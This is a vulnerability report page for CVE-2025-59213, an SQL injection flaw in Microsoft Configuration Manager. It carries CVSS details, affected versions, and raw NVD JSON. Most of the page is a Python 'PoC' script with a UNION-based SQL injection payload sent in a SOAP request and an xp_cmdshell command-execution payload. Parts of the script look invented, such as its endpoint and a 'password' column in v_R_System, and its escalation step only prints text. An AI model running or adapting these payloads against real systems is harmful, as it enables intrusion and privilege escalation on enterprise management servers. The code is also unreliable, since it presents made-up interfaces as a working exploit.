Security Vulnerability Report
CVE-2025-59213 CVSS 8.8 HIGH

Published: 2025-10-14 17:16:02
Last Modified: 2026-02-13 21:16:19

Description

Improper neutralization of special elements used in an SQL command ('SQL injection') in Microsoft Configuration Manager allows an unauthorized attacker to elevate privileges over an adjacent network.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:configuration_manager_2403:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:configuration_manager_2409:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:configuration_manager_2503:*:*:*:*:*:*:*:* - VULNERABLE
Microsoft Configuration Manager (all supported versions; for the specific version ranges, refer to Microsoft's official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59213 - Microsoft Configuration Manager SQL Injection PoC
# Vulnerability: Improper neutralization of special elements used in an SQL command
# Affected: Microsoft Configuration Manager
# Attack Vector: Adjacent Network (AV:A), No Authentication Required (PR:N)
import requests
import socket
import struct

TARGET_HOST = "192.168.1.100"  # SCCM Site Server IP
SMS_PROVIDER_PORT = 80  # SMS Provider default port


def exploit_sql_injection(target_host, port):
    """
    Exploit SQL injection in Microsoft Configuration Manager SMS Provider.
    The SMS Provider service fails to properly sanitize user-supplied input
    before incorporating it into SQL queries against the site database.
    """
    # Malicious SQL payload leveraging UNION-based injection
    # The injection point is typically in resource discovery or client registration requests
    sql_payload = (
        "1' UNION SELECT "
        "@@version, "
        "SYSTEM_USER, "
        "(SELECT TOP 1 password FROM v_R_System), "
        "DB_NAME(), "
        "'injected'-- "
    )

    # WMI/SMS Provider query exploitation
    # The SMS Provider exposes management data via WMI/CIM interfaces
    wmi_namespace = "root\\sms\\site_<SITE_CODE>"

    headers = {
        "Content-Type": "application/xml; charset=utf-8",
        "User-Agent": "MOCP/5.0",
    }

    # Crafted SOAP/WMI request with injected SQL payload
    payload_xml = f"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
  <soap:Body>
    <ExecuteQuery xmlns="http://schemas.microsoft.com/sms/2005/06/management">
      <query>SELECT * FROM v_R_System WHERE Name LIKE '%{sql_payload}%'</query>
    </ExecuteQuery>
  </soap:Body>
</soap:Envelope>"""

    try:
        url = f"http://{target_host}:{port}/sms_provider"
        response = requests.post(url, data=payload_xml, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] SQL Injection successful!")
            print(f"[+] Response: {response.text[:500]}")
            return response.text
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")
    return None


def escalate_privileges(sql_result):
    """
    Post-exploitation: Use extracted credentials to escalate privileges
    and gain control over the Configuration Manager infrastructure.
    """
    # Extract sensitive information from SQL injection result
    # Use xp_cmdshell for OS command execution if SQL Server privileges allow
    cmdshell_payload = "1'; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami';--"
    print(f"[*] Attempting privilege escalation via: {cmdshell_payload}")


if __name__ == "__main__":
    print(f"[*] Targeting Microsoft Configuration Manager at {TARGET_HOST}")
    result = exploit_sql_injection(TARGET_HOST, SMS_PROVIDER_PORT)
    if result:
        escalate_privileges(result)

References

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59213 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59213", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:16:01.807", "lastModified": "2026-02-13T21:16:19.043", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Configuration Manager allows an unauthorized attacker to elevate privileges over an adjacent network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:configuration_manager_2403:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.00.9128.1035", "matchCriteriaId": "9CEB0E6F-E984-4382-9C88-C506615D9868"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:configuration_manager_2409:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.00.9132.1029", "matchCriteriaId": "E3B2EC65-EAFA-4938-AAA4-EC49C6A854BA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:configuration_manager_2503:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.00.9135.1008", "matchCriteriaId": "EB0C2F23-3D0B-4683-8956-9DF40D440F2F"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59213", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}